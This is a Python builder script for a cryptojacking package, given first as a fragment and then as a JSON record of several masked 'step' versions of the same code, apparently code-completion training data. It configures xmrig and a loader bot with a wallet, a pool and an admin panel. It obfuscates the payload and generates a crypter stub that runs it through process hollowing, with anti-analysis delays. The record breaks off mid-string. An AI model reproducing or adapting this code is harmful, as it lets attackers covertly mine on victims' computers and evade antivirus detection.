a = sys.argv[5]
load_userdata(u, p, w, l, a)
compile(os.getcwd()+"\\Bot\\", "LoaderBot")
xcopy(os.getcwd()+"\\Bot\\Miner\\bin\\Release\\LoaderBot.exe", "Bot.exe")
compileR(os.getcwd()+"\\rig\\", "xmrig")
xcopy(os.getcwd()+"\\rig\\Release\\xmrig.exe", "out.exe")
crypt("test", key)
os.system("C:\Python27\python.exe cv.py")
writeBytes(key)
compileM(os.getcwd()+"\\Miner\\", "winhost")
xcopy(os.getcwd()+"\\Miner\\Release\\winhost.exe", "in.exe")
print(os.getcwd()+"\\enc.exe")
subprocess.call(os.getcwd()+"\\enc.exe")
crypt("winhost", key)
os.system("del file.txt")
os.system("del in.exe")
os.system("del out.exe")
os.system("del decr.exe")
os.system("del enc.exe")
os.system("del test.exe")
|
flexible
|
{
"blob_id": "d1254e558217cce88de2f83b87d5c54333f1c677",
"index": 9938,
"step-1": "<mask token>\n\n\ndef load_userdata(wallet, pool, ww, logger, adminka):\n with open('D:\\\\msys64\\\\xmrig-master\\\\src\\\\ex.cpp', 'r') as f:\n file = f.read()\n file = file.replace('%u%', wallet)\n file = file.replace('%p%', pool)\n file = file.replace('%w%', ww)\n with open('D:\\\\msys64\\\\xmrig-master\\\\src\\\\xmrig.cpp', 'w') as w:\n w.write(file)\n with open(os.getcwd() + '\\\\Bot\\\\Miner\\\\ex.cs', 'r') as f:\n file = f.read()\n file = file.replace('%l%', logger)\n file = file.replace('%a%', adminka)\n with open(os.getcwd() + '\\\\Bot\\\\Miner\\\\Program.cs', 'w') as w:\n w.write(file)\n\n\ndef writeBytes(key):\n with open(os.getcwd() + '\\\\file.txt', 'r') as f:\n file = f.read()\n with open(os.getcwd() + '\\\\Miner\\\\CryptRunPe\\\\winhost.cpp', 'w') as w:\n w.write(\n \"\"\"#include <stdafx.h>\n#include \"process.h\"\n #include \"memrun.h\"\nusing namespace std;\n\"\"\"\n )\n with open('ex.txt') as ex:\n w.write(file)\n exx = ex.read()\n w.write(exx)\n\n\ndef compile(path, file):\n os.system(\n '%windir%\\\\Microsoft.NET\\\\Framework\\\\v4.0.30319\\\\msbuild.exe \"' +\n path + file + '.sln\" /p:Configuration=Release')\n\n\ndef compileM(path, file):\n os.system('msbuild.exe \"' + path + file + '.sln\" /p:Configuration=Release')\n\n\ndef compileR(path, file):\n os.system('msbuild.exe \"' + path + file +\n '.sln\" /p:Configuration=Release /p:Platform=\"WIN32\"')\n\n\ndef xcopy(path, out):\n try:\n with open(path, 'rb') as f:\n file = f.read()\n with open(out, 'wb') as w:\n w.write(bytearray(file))\n except:\n pass\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef load_userdata(wallet, pool, ww, logger, adminka):\n with open('D:\\\\msys64\\\\xmrig-master\\\\src\\\\ex.cpp', 'r') as f:\n file = f.read()\n file = file.replace('%u%', wallet)\n file = file.replace('%p%', pool)\n file = file.replace('%w%', ww)\n with open('D:\\\\msys64\\\\xmrig-master\\\\src\\\\xmrig.cpp', 'w') as w:\n w.write(file)\n with open(os.getcwd() + '\\\\Bot\\\\Miner\\\\ex.cs', 'r') as f:\n file = f.read()\n file = file.replace('%l%', logger)\n file = file.replace('%a%', adminka)\n with open(os.getcwd() + '\\\\Bot\\\\Miner\\\\Program.cs', 'w') as w:\n w.write(file)\n\n\ndef writeBytes(key):\n with open(os.getcwd() + '\\\\file.txt', 'r') as f:\n file = f.read()\n with open(os.getcwd() + '\\\\Miner\\\\CryptRunPe\\\\winhost.cpp', 'w') as w:\n w.write(\n \"\"\"#include <stdafx.h>\n#include \"process.h\"\n #include \"memrun.h\"\nusing namespace std;\n\"\"\"\n )\n with open('ex.txt') as ex:\n w.write(file)\n exx = ex.read()\n w.write(exx)\n\n\ndef compile(path, file):\n os.system(\n '%windir%\\\\Microsoft.NET\\\\Framework\\\\v4.0.30319\\\\msbuild.exe \"' +\n path + file + '.sln\" /p:Configuration=Release')\n\n\ndef compileM(path, file):\n os.system('msbuild.exe \"' + path + file + '.sln\" /p:Configuration=Release')\n\n\ndef compileR(path, file):\n os.system('msbuild.exe \"' + path + file +\n '.sln\" /p:Configuration=Release /p:Platform=\"WIN32\"')\n\n\ndef xcopy(path, out):\n try:\n with open(path, 'rb') as f:\n file = f.read()\n with open(out, 'wb') as w:\n w.write(bytearray(file))\n except:\n pass\n\n\ndef crypt(name, key):\n with open('encoder.cpp', 'w') as w:\n txt = \"\"\"\n #include <Windows.h>\n #include <winternl.h>\n #include <iostream>\n #include <string>\n #include <fstream>\n using namespace std;\n int main()\n {\n FILE * file = fopen(\"in.exe\", \"rb\");\n if (file == NULL) return 0;\n fseek(file, 0, SEEK_END);\n long int size = ftell(file);\n fclose(file);\n file = fopen(\"in.exe\", \"rb\");\n unsigned char * in = (unsigned char *)malloc(size);\n int bytes_read = fread(in, sizeof(unsigned char), size, file);\n fclose(file);\n for (int i = 0; i < size; i++) {\n in[i] = in[i] - 0x0%n%;\n }\n file = fopen(\"out.exe\", \"wb\");\n int bytes_written = fwrite(in, sizeof(unsigned char), size, file);\n fclose(file);\n for (int i = 0; i < size; i++) {\n in[i] = in[i] + 0x0%n%;\n }\n file = fopen(\"decr.exe\", \"wb\");\n bytes_written = fwrite(in, sizeof(unsigned char), size, file);\n fclose(file);\n return 0;\n }\n \"\"\"\n txt = txt.replace('%n%', str(key))\n w.write(txt)\n os.system('g++ -o enc encoder.cpp')\n os.system('C:\\\\Python27\\\\python.exe cv.py')\n with open('file.txt', 'r') as r:\n with open(os.getcwd() + '\\\\src\\\\crypter\\\\crypter.cpp', 'w') as w:\n txt = \"\"\" #include \"stdafx.h\"\n #include \"Crypter.h\"\n #include <windows.h>\n #include <winternl.h>\n #pragma comment(lib,\"ws2_32.lib\")\n #pragma comment(lib,\"ntdll.lib\")\n \"\"\" + r.read() + \"\"\" int RunPortableExecutable(void* Image) {\n IMAGE_DOS_HEADER* DOSHeader;\n IMAGE_NT_HEADERS* NtHeader;\n IMAGE_SECTION_HEADER* SectionHeader;\n PROCESS_INFORMATION PI;\n STARTUPINFOA SI;\n CONTEXT* CTX;\n DWORD* ImageBase;\n void* pImageBase;\n int count;\n char buffer[MAX_PATH];\n GetModuleFileNameA(NULL, (LPSTR)buffer, MAX_PATH);\n char *CurrentFilePath = buffer;\n DOSHeader = PIMAGE_DOS_HEADER(Image);\n NtHeader = PIMAGE_NT_HEADERS(DWORD(Image) + DOSHeader->e_lfanew);\n if (NtHeader->Signature == IMAGE_NT_SIGNATURE) {\n ZeroMemory(&PI, sizeof(PI));\n ZeroMemory(&SI, sizeof(SI));\n typedef LONG(WINAPI * NtUnmapViewOfSection)(HANDLE ProcessHandle, PVOID BaseAddress);\n NtUnmapViewOfSection mNtUnmapViewOfSection;\n if (CreateProcessA(CurrentFilePath, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED | CREATE_NO_WINDOW, NULL, NULL, &SI, &PI)) {\n CTX = PCONTEXT(VirtualAlloc(NULL, sizeof(CTX), MEM_COMMIT, PAGE_READWRITE));\n CTX->ContextFlags = CONTEXT_FULL;\n if (GetThreadContext(PI.hThread, LPCONTEXT(CTX))) {\n ReadProcessMemory(PI.hProcess, LPCVOID(CTX->Ebx + 8), LPVOID(&ImageBase), 4, 0);\n pImageBase = VirtualAllocEx(PI.hProcess, LPVOID(NtHeader->OptionalHeader.ImageBase),\n NtHeader->OptionalHeader.SizeOfImage, 0x3000, PAGE_EXECUTE_READWRITE);\n WriteProcessMemory(PI.hProcess, pImageBase, Image, NtHeader->OptionalHeader.SizeOfHeaders, NULL);\n for (count = 0; count < NtHeader->FileHeader.NumberOfSections; count++) {\n SectionHeader = PIMAGE_SECTION_HEADER(DWORD(Image) + DOSHeader->e_lfanew + 248 + (count * 40));\n WriteProcessMemory(PI.hProcess, LPVOID(DWORD(pImageBase) + SectionHeader->VirtualAddress),\n LPVOID(DWORD(Image) + SectionHeader->PointerToRawData), SectionHeader->SizeOfRawData, 0);\n }\n WriteProcessMemory(PI.hProcess, LPVOID(CTX->Ebx + 8), LPVOID(&NtHeader->OptionalHeader.ImageBase), 4, 0);\n CTX->Eax = DWORD(pImageBase) + NtHeader->OptionalHeader.AddressOfEntryPoint;\n SetThreadContext(PI.hThread, LPCONTEXT(CTX));\n ResumeThread(PI.hThread);\n return 0;\n }\n }\n }\n }\n int APIENTRY _tWinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPTSTR lpCmdLine, int nCmdShow) {\n for (int i = 0; i < 550000; i++)\n OutputDebugStringW(L\"\");\n for (int i = 0; i < sizeof(rawData) / sizeof(*rawData); i++) {\n unsigned char b = rawData[i] + 0x0%n%;\n rawData[i] = b;\n }\n Sleep(((rand() % 5 + 1) + 5) * 1000);\n RunPortableExecutable(rawData);\n return 0;\n } \"\"\"\n txt = txt.replace('%n%', str(key))\n w.write(txt)\n compileM(os.getcwd() + '\\\\src\\\\', 'ConsoleApplication1')\n xcopy(os.getcwd() + '\\\\src\\\\Release\\\\Crypter.exe', os.getcwd() +\n '\\\\' + name + '.exe')\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef load_userdata(wallet, pool, ww, logger, adminka):\n with open('D:\\\\msys64\\\\xmrig-master\\\\src\\\\ex.cpp', 'r') as f:\n file = f.read()\n file = file.replace('%u%', wallet)\n file = file.replace('%p%', pool)\n file = file.replace('%w%', ww)\n with open('D:\\\\msys64\\\\xmrig-master\\\\src\\\\xmrig.cpp', 'w') as w:\n w.write(file)\n with open(os.getcwd() + '\\\\Bot\\\\Miner\\\\ex.cs', 'r') as f:\n file = f.read()\n file = file.replace('%l%', logger)\n file = file.replace('%a%', adminka)\n with open(os.getcwd() + '\\\\Bot\\\\Miner\\\\Program.cs', 'w') as w:\n w.write(file)\n\n\ndef writeBytes(key):\n with open(os.getcwd() + '\\\\file.txt', 'r') as f:\n file = f.read()\n with open(os.getcwd() + '\\\\Miner\\\\CryptRunPe\\\\winhost.cpp', 'w') as w:\n w.write(\n \"\"\"#include <stdafx.h>\n#include \"process.h\"\n #include \"memrun.h\"\nusing namespace std;\n\"\"\"\n )\n with open('ex.txt') as ex:\n w.write(file)\n exx = ex.read()\n w.write(exx)\n\n\ndef compile(path, file):\n os.system(\n '%windir%\\\\Microsoft.NET\\\\Framework\\\\v4.0.30319\\\\msbuild.exe \"' +\n path + file + '.sln\" /p:Configuration=Release')\n\n\ndef compileM(path, file):\n os.system('msbuild.exe \"' + path + file + '.sln\" /p:Configuration=Release')\n\n\ndef compileR(path, file):\n os.system('msbuild.exe \"' + path + file +\n '.sln\" /p:Configuration=Release /p:Platform=\"WIN32\"')\n\n\ndef xcopy(path, out):\n try:\n with open(path, 'rb') as f:\n file = f.read()\n with open(out, 'wb') as w:\n w.write(bytearray(file))\n except:\n pass\n\n\ndef crypt(name, key):\n with open('encoder.cpp', 'w') as w:\n txt = \"\"\"\n #include <Windows.h>\n #include <winternl.h>\n #include <iostream>\n #include <string>\n #include <fstream>\n using namespace std;\n int main()\n {\n FILE * file = fopen(\"in.exe\", \"rb\");\n if (file == NULL) return 0;\n fseek(file, 0, SEEK_END);\n long int size = ftell(file);\n fclose(file);\n file = fopen(\"in.exe\", \"rb\");\n unsigned char * in = (unsigned char *)malloc(size);\n int bytes_read = fread(in, sizeof(unsigned char), size, file);\n fclose(file);\n for (int i = 0; i < size; i++) {\n in[i] = in[i] - 0x0%n%;\n }\n file = fopen(\"out.exe\", \"wb\");\n int bytes_written = fwrite(in, sizeof(unsigned char), size, file);\n fclose(file);\n for (int i = 0; i < size; i++) {\n in[i] = in[i] + 0x0%n%;\n }\n file = fopen(\"decr.exe\", \"wb\");\n bytes_written = fwrite(in, sizeof(unsigned char), size, file);\n fclose(file);\n return 0;\n }\n \"\"\"\n txt = txt.replace('%n%', str(key))\n w.write(txt)\n os.system('g++ -o enc encoder.cpp')\n os.system('C:\\\\Python27\\\\python.exe cv.py')\n with open('file.txt', 'r') as r:\n with open(os.getcwd() + '\\\\src\\\\crypter\\\\crypter.cpp', 'w') as w:\n txt = \"\"\" #include \"stdafx.h\"\n #include \"Crypter.h\"\n #include <windows.h>\n #include <winternl.h>\n #pragma comment(lib,\"ws2_32.lib\")\n #pragma comment(lib,\"ntdll.lib\")\n \"\"\" + r.read() + \"\"\" int RunPortableExecutable(void* Image) {\n IMAGE_DOS_HEADER* DOSHeader;\n IMAGE_NT_HEADERS* NtHeader;\n IMAGE_SECTION_HEADER* SectionHeader;\n PROCESS_INFORMATION PI;\n STARTUPINFOA SI;\n CONTEXT* CTX;\n DWORD* ImageBase;\n void* pImageBase;\n int count;\n char buffer[MAX_PATH];\n GetModuleFileNameA(NULL, (LPSTR)buffer, MAX_PATH);\n char *CurrentFilePath = buffer;\n DOSHeader = PIMAGE_DOS_HEADER(Image);\n NtHeader = PIMAGE_NT_HEADERS(DWORD(Image) + DOSHeader->e_lfanew);\n if (NtHeader->Signature == IMAGE_NT_SIGNATURE) {\n ZeroMemory(&PI, sizeof(PI));\n ZeroMemory(&SI, sizeof(SI));\n typedef LONG(WINAPI * NtUnmapViewOfSection)(HANDLE ProcessHandle, PVOID BaseAddress);\n NtUnmapViewOfSection mNtUnmapViewOfSection;\n if (CreateProcessA(CurrentFilePath, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED | CREATE_NO_WINDOW, NULL, NULL, &SI, &PI)) {\n CTX = PCONTEXT(VirtualAlloc(NULL, sizeof(CTX), MEM_COMMIT, PAGE_READWRITE));\n CTX->ContextFlags = CONTEXT_FULL;\n if (GetThreadContext(PI.hThread, LPCONTEXT(CTX))) {\n ReadProcessMemory(PI.hProcess, LPCVOID(CTX->Ebx + 8), LPVOID(&ImageBase), 4, 0);\n pImageBase = VirtualAllocEx(PI.hProcess, LPVOID(NtHeader->OptionalHeader.ImageBase),\n NtHeader->OptionalHeader.SizeOfImage, 0x3000, PAGE_EXECUTE_READWRITE);\n WriteProcessMemory(PI.hProcess, pImageBase, Image, NtHeader->OptionalHeader.SizeOfHeaders, NULL);\n for (count = 0; count < NtHeader->FileHeader.NumberOfSections; count++) {\n SectionHeader = PIMAGE_SECTION_HEADER(DWORD(Image) + DOSHeader->e_lfanew + 248 + (count * 40));\n WriteProcessMemory(PI.hProcess, LPVOID(DWORD(pImageBase) + SectionHeader->VirtualAddress),\n LPVOID(DWORD(Image) + SectionHeader->PointerToRawData), SectionHeader->SizeOfRawData, 0);\n }\n WriteProcessMemory(PI.hProcess, LPVOID(CTX->Ebx + 8), LPVOID(&NtHeader->OptionalHeader.ImageBase), 4, 0);\n CTX->Eax = DWORD(pImageBase) + NtHeader->OptionalHeader.AddressOfEntryPoint;\n SetThreadContext(PI.hThread, LPCONTEXT(CTX));\n ResumeThread(PI.hThread);\n return 0;\n }\n }\n }\n }\n int APIENTRY _tWinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPTSTR lpCmdLine, int nCmdShow) {\n for (int i = 0; i < 550000; i++)\n OutputDebugStringW(L\"\");\n for (int i = 0; i < sizeof(rawData) / sizeof(*rawData); i++) {\n unsigned char b = rawData[i] + 0x0%n%;\n rawData[i] = b;\n }\n Sleep(((rand() % 5 + 1) + 5) * 1000);\n RunPortableExecutable(rawData);\n return 0;\n } \"\"\"\n txt = txt.replace('%n%', str(key))\n w.write(txt)\n compileM(os.getcwd() + '\\\\src\\\\', 'ConsoleApplication1')\n xcopy(os.getcwd() + '\\\\src\\\\Release\\\\Crypter.exe', os.getcwd() +\n '\\\\' + name + '.exe')\n\n\n<mask token>\nload_userdata(u, p, w, l, a)\ncompile(os.getcwd() + '\\\\Bot\\\\', 'LoaderBot')\nxcopy(os.getcwd() + '\\\\Bot\\\\Miner\\\\bin\\\\Release\\\\LoaderBot.exe', 'Bot.exe')\ncompileR(os.getcwd() + '\\\\rig\\\\', 'xmrig')\nxcopy(os.getcwd() + '\\\\rig\\\\Release\\\\xmrig.exe', 'out.exe')\ncrypt('test', key)\nos.system('C:\\\\Python27\\\\python.exe cv.py')\nwriteBytes(key)\ncompileM(os.getcwd() + '\\\\Miner\\\\', 'winhost')\nxcopy(os.getcwd() + '\\\\Miner\\\\Release\\\\winhost.exe', 'in.exe')\nprint(os.getcwd() + '\\\\enc.exe')\nsubprocess.call(os.getcwd() + '\\\\enc.exe')\ncrypt('winhost', key)\nos.system('del file.txt')\nos.system('del in.exe')\nos.system('del out.exe')\nos.system('del decr.exe')\nos.system('del enc.exe')\nos.system('del test.exe')\n",
"step-4": "<mask token>\n\n\ndef load_userdata(wallet, pool, ww, logger, adminka):\n with open('D:\\\\msys64\\\\xmrig-master\\\\src\\\\ex.cpp', 'r') as f:\n file = f.read()\n file = file.replace('%u%', wallet)\n file = file.replace('%p%', pool)\n file = file.replace('%w%', ww)\n with open('D:\\\\msys64\\\\xmrig-master\\\\src\\\\xmrig.cpp', 'w') as w:\n w.write(file)\n with open(os.getcwd() + '\\\\Bot\\\\Miner\\\\ex.cs', 'r') as f:\n file = f.read()\n file = file.replace('%l%', logger)\n file = file.replace('%a%', adminka)\n with open(os.getcwd() + '\\\\Bot\\\\Miner\\\\Program.cs', 'w') as w:\n w.write(file)\n\n\ndef writeBytes(key):\n with open(os.getcwd() + '\\\\file.txt', 'r') as f:\n file = f.read()\n with open(os.getcwd() + '\\\\Miner\\\\CryptRunPe\\\\winhost.cpp', 'w') as w:\n w.write(\n \"\"\"#include <stdafx.h>\n#include \"process.h\"\n #include \"memrun.h\"\nusing namespace std;\n\"\"\"\n )\n with open('ex.txt') as ex:\n w.write(file)\n exx = ex.read()\n w.write(exx)\n\n\ndef compile(path, file):\n os.system(\n '%windir%\\\\Microsoft.NET\\\\Framework\\\\v4.0.30319\\\\msbuild.exe \"' +\n path + file + '.sln\" /p:Configuration=Release')\n\n\ndef compileM(path, file):\n os.system('msbuild.exe \"' + path + file + '.sln\" /p:Configuration=Release')\n\n\ndef compileR(path, file):\n os.system('msbuild.exe \"' + path + file +\n '.sln\" /p:Configuration=Release /p:Platform=\"WIN32\"')\n\n\ndef xcopy(path, out):\n try:\n with open(path, 'rb') as f:\n file = f.read()\n with open(out, 'wb') as w:\n w.write(bytearray(file))\n except:\n pass\n\n\ndef crypt(name, key):\n with open('encoder.cpp', 'w') as w:\n txt = \"\"\"\n #include <Windows.h>\n #include <winternl.h>\n #include <iostream>\n #include <string>\n #include <fstream>\n using namespace std;\n int main()\n {\n FILE * file = fopen(\"in.exe\", \"rb\");\n if (file == NULL) return 0;\n fseek(file, 0, SEEK_END);\n long int size = ftell(file);\n fclose(file);\n file = fopen(\"in.exe\", \"rb\");\n unsigned char * in = (unsigned char *)malloc(size);\n int bytes_read = fread(in, sizeof(unsigned char), size, file);\n fclose(file);\n for (int i = 0; i < size; i++) {\n in[i] = in[i] - 0x0%n%;\n }\n file = fopen(\"out.exe\", \"wb\");\n int bytes_written = fwrite(in, sizeof(unsigned char), size, file);\n fclose(file);\n for (int i = 0; i < size; i++) {\n in[i] = in[i] + 0x0%n%;\n }\n file = fopen(\"decr.exe\", \"wb\");\n bytes_written = fwrite(in, sizeof(unsigned char), size, file);\n fclose(file);\n return 0;\n }\n \"\"\"\n txt = txt.replace('%n%', str(key))\n w.write(txt)\n os.system('g++ -o enc encoder.cpp')\n os.system('C:\\\\Python27\\\\python.exe cv.py')\n with open('file.txt', 'r') as r:\n with open(os.getcwd() + '\\\\src\\\\crypter\\\\crypter.cpp', 'w') as w:\n txt = \"\"\" #include \"stdafx.h\"\n #include \"Crypter.h\"\n #include <windows.h>\n #include <winternl.h>\n #pragma comment(lib,\"ws2_32.lib\")\n #pragma comment(lib,\"ntdll.lib\")\n \"\"\" + r.read() + \"\"\" int RunPortableExecutable(void* Image) {\n IMAGE_DOS_HEADER* DOSHeader;\n IMAGE_NT_HEADERS* NtHeader;\n IMAGE_SECTION_HEADER* SectionHeader;\n PROCESS_INFORMATION PI;\n STARTUPINFOA SI;\n CONTEXT* CTX;\n DWORD* ImageBase;\n void* pImageBase;\n int count;\n char buffer[MAX_PATH];\n GetModuleFileNameA(NULL, (LPSTR)buffer, MAX_PATH);\n char *CurrentFilePath = buffer;\n DOSHeader = PIMAGE_DOS_HEADER(Image);\n NtHeader = PIMAGE_NT_HEADERS(DWORD(Image) + DOSHeader->e_lfanew);\n if (NtHeader->Signature == IMAGE_NT_SIGNATURE) {\n ZeroMemory(&PI, sizeof(PI));\n ZeroMemory(&SI, sizeof(SI));\n typedef LONG(WINAPI * NtUnmapViewOfSection)(HANDLE ProcessHandle, PVOID BaseAddress);\n NtUnmapViewOfSection mNtUnmapViewOfSection;\n if (CreateProcessA(CurrentFilePath, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED | CREATE_NO_WINDOW, NULL, NULL, &SI, &PI)) {\n CTX = PCONTEXT(VirtualAlloc(NULL, sizeof(CTX), MEM_COMMIT, PAGE_READWRITE));\n CTX->ContextFlags = CONTEXT_FULL;\n if (GetThreadContext(PI.hThread, LPCONTEXT(CTX))) {\n ReadProcessMemory(PI.hProcess, LPCVOID(CTX->Ebx + 8), LPVOID(&ImageBase), 4, 0);\n pImageBase = VirtualAllocEx(PI.hProcess, LPVOID(NtHeader->OptionalHeader.ImageBase),\n NtHeader->OptionalHeader.SizeOfImage, 0x3000, PAGE_EXECUTE_READWRITE);\n WriteProcessMemory(PI.hProcess, pImageBase, Image, NtHeader->OptionalHeader.SizeOfHeaders, NULL);\n for (count = 0; count < NtHeader->FileHeader.NumberOfSections; count++) {\n SectionHeader = PIMAGE_SECTION_HEADER(DWORD(Image) + DOSHeader->e_lfanew + 248 + (count * 40));\n WriteProcessMemory(PI.hProcess, LPVOID(DWORD(pImageBase) + SectionHeader->VirtualAddress),\n LPVOID(DWORD(Image) + SectionHeader->PointerToRawData), SectionHeader->SizeOfRawData, 0);\n }\n WriteProcessMemory(PI.hProcess, LPVOID(CTX->Ebx + 8), LPVOID(&NtHeader->OptionalHeader.ImageBase), 4, 0);\n CTX->Eax = DWORD(pImageBase) + NtHeader->OptionalHeader.AddressOfEntryPoint;\n SetThreadContext(PI.hThread, LPCONTEXT(CTX));\n ResumeThread(PI.hThread);\n return 0;\n }\n }\n }\n }\n int APIENTRY _tWinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPTSTR lpCmdLine, int nCmdShow) {\n for (int i = 0; i < 550000; i++)\n OutputDebugStringW(L\"\");\n for (int i = 0; i < sizeof(rawData) / sizeof(*rawData); i++) {\n unsigned char b = rawData[i] + 0x0%n%;\n rawData[i] = b;\n }\n Sleep(((rand() % 5 + 1) + 5) * 1000);\n RunPortableExecutable(rawData);\n return 0;\n } \"\"\"\n txt = txt.replace('%n%', str(key))\n w.write(txt)\n compileM(os.getcwd() + '\\\\src\\\\', 'ConsoleApplication1')\n xcopy(os.getcwd() + '\\\\src\\\\Release\\\\Crypter.exe', os.getcwd() +\n '\\\\' + name + '.exe')\n\n\nkey = random.randint(1, 100)\nu = sys.argv[1]\nw = sys.argv[2]\np = sys.argv[3]\nl = sys.argv[4]\na = sys.argv[5]\nload_userdata(u, p, w, l, a)\ncompile(os.getcwd() + '\\\\Bot\\\\', 'LoaderBot')\nxcopy(os.getcwd() + '\\\\Bot\\\\Miner\\\\bin\\\\Release\\\\LoaderBot.exe', 'Bot.exe')\ncompileR(os.getcwd() + '\\\\rig\\\\', 'xmrig')\nxcopy(os.getcwd() + '\\\\rig\\\\Release\\\\xmrig.exe', 'out.exe')\ncrypt('test', key)\nos.system('C:\\\\Python27\\\\python.exe cv.py')\nwriteBytes(key)\ncompileM(os.getcwd() + '\\\\Miner\\\\', 'winhost')\nxcopy(os.getcwd() + '\\\\Miner\\\\Release\\\\winhost.exe', 'in.exe')\nprint(os.getcwd() + '\\\\enc.exe')\nsubprocess.call(os.getcwd() + '\\\\enc.exe')\ncrypt('winhost', key)\nos.system('del file.txt')\nos.system('del in.exe')\nos.system('del out.exe')\nos.system('del decr.exe')\nos.system('del enc.exe')\nos.system('del test.exe')\n",
"step-5": "import os, sys, time, random, subprocess\n\n\ndef load_userdata(wallet, pool, ww, logger, adminka):\n with open(\"D:\\\\msys64\\\\xmrig-master\\\\src\\\\ex.cpp\", \"r\") as f:\n file = f.read()\n file = file.replace(\"%u%\", wallet)\n file = file.replace(\"%p%\", pool)\n file = file.replace(\"%w%\", ww)\n with open(\"D:\\\\msys64\\\\xmrig-master\\\\src\\\\xmrig.cpp\", \"w\") as w:\n w.write(file)\n with open(os.getcwd()+\"\\\\Bot\\\\Miner\\\\ex.cs\", \"r\") as f:\n file = f.read()\n file = file.replace(\"%l%\", logger)\n file = file.replace(\"%a%\", adminka)\n with open(os.getcwd()+\"\\\\Bot\\\\Miner\\\\Program.cs\", \"w\") as w:\n w.write(file)\n\ndef writeBytes(key):\n with open(os.getcwd()+\"\\\\file.txt\", \"r\") as f:\n file = f.read()\n with open(os.getcwd()+\"\\\\Miner\\\\CryptRunPe\\\\winhost.cpp\", \"w\") as w:\n w.write(\"#include <stdafx.h>\\n#include \\\"process.h\\\"\\n #include \\\"memrun.h\\\"\\nusing namespace std;\\n\")\n with open(\"ex.txt\") as ex:\n w.write(file)\n exx = ex.read()\n w.write(exx)\n\ndef compile(path, file):\n os.system(\"%windir%\\Microsoft.NET\\Framework\\\\v4.0.30319\\msbuild.exe \\\"\"+path+file+\".sln\\\" /p:Configuration=Release\")\n\t\ndef compileM(path, file):\n os.system(\"msbuild.exe \\\"\"+path+file+\".sln\\\" /p:Configuration=Release\")\n\ndef compileR(path, file):\n os.system(\"msbuild.exe \\\"\"+path+file+\".sln\\\" /p:Configuration=Release /p:Platform=\\\"WIN32\\\"\")\ndef xcopy(path, out):\n try:\n with open(path, \"rb\") as f:\n file = f.read()\n with open(out, \"wb\") as w:\n w.write(bytearray(file))\n except:\n pass\n\n\ndef crypt(name, key):\n with open('encoder.cpp', 'w') as w:\n txt = '\\n\\\n #include <Windows.h>\\n\\\n #include <winternl.h>\\n\\\n #include <iostream>\\n\\\n #include <string>\\n\\\n #include <fstream>\\n\\\n using namespace std;\\n\\\n int main()\\n\\\n {\\n\\\n FILE * file = fopen(\"in.exe\", \"rb\");\\n\\\n if (file == NULL) return 0;\\n\\\n fseek(file, 0, SEEK_END);\\n\\\n long int size = ftell(file);\\n\\\n fclose(file);\\n\\\n file = fopen(\"in.exe\", \"rb\");\\n\\\n unsigned char * in = (unsigned char *)malloc(size);\\n\\\n int bytes_read = fread(in, sizeof(unsigned char), size, file);\\n\\\n fclose(file);\\n\\\n for (int i = 0; i < size; i++) {\\n\\\n in[i] = in[i] - 0x0%n%;\\n\\\n }\\n\\\n file = fopen(\"out.exe\", \"wb\");\\n\\\n int bytes_written = fwrite(in, sizeof(unsigned char), size, file);\\n\\\n fclose(file);\\n\\\n for (int i = 0; i < size; i++) {\\n\\\n in[i] = in[i] + 0x0%n%;\\n\\\n }\\n\\\n file = fopen(\"decr.exe\", \"wb\");\\n\\\n bytes_written = fwrite(in, sizeof(unsigned char), size, file);\\n\\\n fclose(file);\\n\\\n return 0;\\n\\\n }\\n\\\n '\n txt = txt.replace(\"%n%\", str(key))\n w.write(txt)\n os.system(\"g++ -o enc encoder.cpp\")\n os.system(\"C:\\Python27\\python.exe cv.py\")\n with open('file.txt', 'r') as r:\n with open(os.getcwd()+\"\\\\src\\\\crypter\\\\crypter.cpp\", \"w\") as w:\n txt = '\\\n #include \"stdafx.h\"\\n\\\n #include \"Crypter.h\"\\n\\\n #include <windows.h>\\n\\\n #include <winternl.h>\\n\\\n #pragma comment(lib,\"ws2_32.lib\")\\n\\\n #pragma comment(lib,\"ntdll.lib\")\\n\\\n '+ r.read() + '\\\n int RunPortableExecutable(void* Image) {\\n\\\n IMAGE_DOS_HEADER* DOSHeader;\\n\\\n IMAGE_NT_HEADERS* NtHeader;\\n\\\n IMAGE_SECTION_HEADER* SectionHeader;\\n\\\n PROCESS_INFORMATION PI;\\n\\\n STARTUPINFOA SI;\\n\\\n CONTEXT* CTX;\\n\\\n DWORD* ImageBase;\\n\\\n void* pImageBase;\\n\\\n int count;\\n\\\n char buffer[MAX_PATH];\\n\\\n GetModuleFileNameA(NULL, (LPSTR)buffer, MAX_PATH);\\n\\\n char *CurrentFilePath = buffer;\\n\\\n DOSHeader = PIMAGE_DOS_HEADER(Image);\\n\\\n NtHeader = PIMAGE_NT_HEADERS(DWORD(Image) + DOSHeader->e_lfanew);\\n\\\n if (NtHeader->Signature == IMAGE_NT_SIGNATURE) {\\n\\\n ZeroMemory(&PI, sizeof(PI));\\n\\\n ZeroMemory(&SI, sizeof(SI));\\n\\\n typedef LONG(WINAPI * NtUnmapViewOfSection)(HANDLE ProcessHandle, PVOID BaseAddress);\\n\\\n NtUnmapViewOfSection mNtUnmapViewOfSection;\\n\\\n if (CreateProcessA(CurrentFilePath, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED | CREATE_NO_WINDOW, NULL, NULL, &SI, &PI)) {\\n\\\n CTX = PCONTEXT(VirtualAlloc(NULL, sizeof(CTX), MEM_COMMIT, PAGE_READWRITE));\\n\\\n CTX->ContextFlags = CONTEXT_FULL;\\n\\\n if (GetThreadContext(PI.hThread, LPCONTEXT(CTX))) {\\n\\\n ReadProcessMemory(PI.hProcess, LPCVOID(CTX->Ebx + 8), LPVOID(&ImageBase), 4, 0);\\n\\\n pImageBase = VirtualAllocEx(PI.hProcess, LPVOID(NtHeader->OptionalHeader.ImageBase),\\n\\\n NtHeader->OptionalHeader.SizeOfImage, 0x3000, PAGE_EXECUTE_READWRITE);\\n\\\n WriteProcessMemory(PI.hProcess, pImageBase, Image, NtHeader->OptionalHeader.SizeOfHeaders, NULL);\\n\\\n for (count = 0; count < NtHeader->FileHeader.NumberOfSections; count++) {\\n\\\n SectionHeader = 